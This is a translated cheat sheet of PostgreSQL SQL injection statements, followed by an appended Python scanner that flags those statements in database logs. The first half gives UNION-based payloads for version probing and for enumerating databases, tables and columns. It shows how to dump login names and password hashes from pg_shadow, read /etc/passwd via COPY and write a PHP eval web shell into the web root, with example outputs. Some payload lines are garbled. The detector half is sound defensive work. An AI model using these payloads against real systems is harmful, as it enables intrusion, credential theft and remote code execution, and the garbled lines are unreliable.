A handful of statement types come up again and again in SQL injection: displaying the version, dumping data from a known table and column, listing databases, listing the tables in a database, listing the columns in a table, reading configuration information (for example the database login accounts and passwords), and reading and writing files. I will go through the PostgreSQL syntax for each in turn.
-- Display version
- Select version();
- Union select 1, 2,... n, version()
- // The version() function is the same as in MySQL.
######################################## ######################################## ###########
Example output: PostgreSQL 8.1.18 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-46)
-- Dump data from a known table and column
- Select aa from bb where cc = dd;
- Union select 1, 2,... n, aa from bb where cc = dd
- // Almost every SQL dialect uses this same syntax to dump data.
######################################## ######################################## ###########
No example
-- List databases
- Select datname from pg_database;
- Union select 1, 2,..., n, datname from pg_database;
######################################## ######################################## ###########
Example output: ipvs, prc, template1, template0
-- List tables in the database
- Select relname from pg_stat_user_tables limit 1 offset n;
- // Roughly comparable to information_schema.tables in MySQL, although the comparison is not exact
- Union select relname from pg_stat_user_tables limit 1 offset 3;
- // limit 1 offset 0 is the equivalent of MySQL's limit 0,1.
######################################## ######################################## ###########
No example
-- List columns in a table
- Select column_name from information_schema.columns where table_name = 'xxx' limit 1 offset n;
- Union select 1, 2,..., n, column_name from information_schema.columns where table_name = 0x3a limit 1 offset 5
######################################## ######################################## ###########
// Same as MySQL
-- Read configuration information, such as database login account and password
- Select usename, passwd from pg_shadow;
- Union select 1, 2,... n, usename, passwd from pg_shadow
- // pg_shadow is similar to the mysql database in MySQL.
######################################## ######################################## ###########
Example output: postgres 9d2e7638fd7c7e433f0074a8f65cfd3a
-- Read files
- Create table test (code text );
- Copy test from '/etc/passwd' with delimiter E'\t';
- (Note: most PostgreSQL statements found on the Internet use double quotation marks. In actual tests on 8.x to 9.x, double quotation marks are invalid; single quotation marks should be used.)
######################################## ######################################## ###########
Example output: Query failed: ERROR: extra data after last expected column CONTEXT: COPY file, line 1: "root:x:0:0:root:/root:/bin/bash"
-- Write files
- Insert into test values ('<? Php eval ($ _ POST ["cmd"];?> ');
- Copy test (code) to "/var/www/one. php ";
######################################## ######################################## ###########
Example output: Query failed: ERROR: could not open file "/var/www/html/aaa.php" for writing: Permission denied
pg_file_read() is not as useful as load_file() in MySQL. For example:
- Select pg_file_read('pg_hba.conf', 1, pg_file_length('pg_hba.conf'));
######################################## ######################################## ###########
The output is then: Query failed: ERROR: function pg_file_length("unknown") does not exist HINT: No function matches the given name and argument types. You may need to add explicit type casts.
I am not familiar with PostgreSQL either, so I will leave it here.
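The statements above seen from the server side, as an added example that is not part of the original article: a Python check that flags PostgreSQL statement-log lines in which an application role touches the catalog objects or server-side file paths listed on this page. The log prefix format, the role names `webapp` and `dba`, the rule names and the sample lines are all assumptions constructed for the example.

```python
import re

# Rule names are illustrative; patterns cover the objects this page's statements touch.
RULES = [
    ("version_probe",   re.compile(r"\bversion\s*\(\s*\)", re.I)),
    ("database_enum",   re.compile(r"\bpg_database\b", re.I)),
    ("table_enum",      re.compile(r"\bpg_stat_user_tables\b", re.I)),
    ("column_enum",     re.compile(r"\binformation_schema\s*\.\s*columns\b", re.I)),
    ("credential_read", re.compile(r"\bpg_shadow\b", re.I)),
    ("server_file_io",  re.compile(r"\bcopy\b.+?\b(?:from|to)\s+E?['\"]/", re.I)),
    ("server_file_io",  re.compile(r"\bpg_file_read\s*\(", re.I)),
]
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

# Assumed log_line_prefix '%m [%p] %u@%d ' with statement logging enabled.
LINE = re.compile(r"^\S+ \S+ \S+ \[\d+\] (?P<user>[^@\s]+)@(?P<db>\S+) "
                  r"LOG:\s+statement: (?P<sql>.*)$")

def classify(sql):
    """Return the sorted rule names one statement matches, plus 'via_union'."""
    tags = sorted({name for name, rx in RULES if rx.search(sql)})
    if tags and UNION.search(sql):
        tags.append("via_union")
    return tags

def scan(lines, app_roles=("webapp",)):
    """Flag statements from application roles, which should never need these objects."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m or m["user"] not in app_roles:
            continue  # unparsed line, or a role (e.g. a DBA) outside the watch list
        tags = classify(m["sql"])
        if tags:
            hits.append((m["user"], m["db"], tags))
    return hits

# Constructed sample log lines (not from a real system).
SAMPLE = [
    "2024-05-01 10:00:01.120 UTC [4121] webapp@shop LOG:  statement: SELECT name, price FROM items WHERE id = 7",
    "2024-05-01 10:00:02.480 UTC [4121] webapp@shop LOG:  statement: SELECT name, price FROM items WHERE id = 7 UNION SELECT usename, passwd FROM pg_shadow",
    "2024-05-01 10:00:03.910 UTC [4121] webapp@shop LOG:  statement: COPY test FROM '/etc/passwd' WITH DELIMITER E'\\t'",
    "2024-05-01 10:00:05.002 UTC [3999] dba@shop LOG:  statement: SELECT datname FROM pg_database",
    "2024-05-01 10:00:06.300 UTC [4121] webapp@shop LOG:  statement: SELECT relname FROM pg_stat_user_tables LIMIT 1 OFFSET 3",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Restricting the scan to application roles keeps routine DBA catalog queries out of the alerts; a web application's own role has no reason to read pg_shadow or to run COPY against a server path.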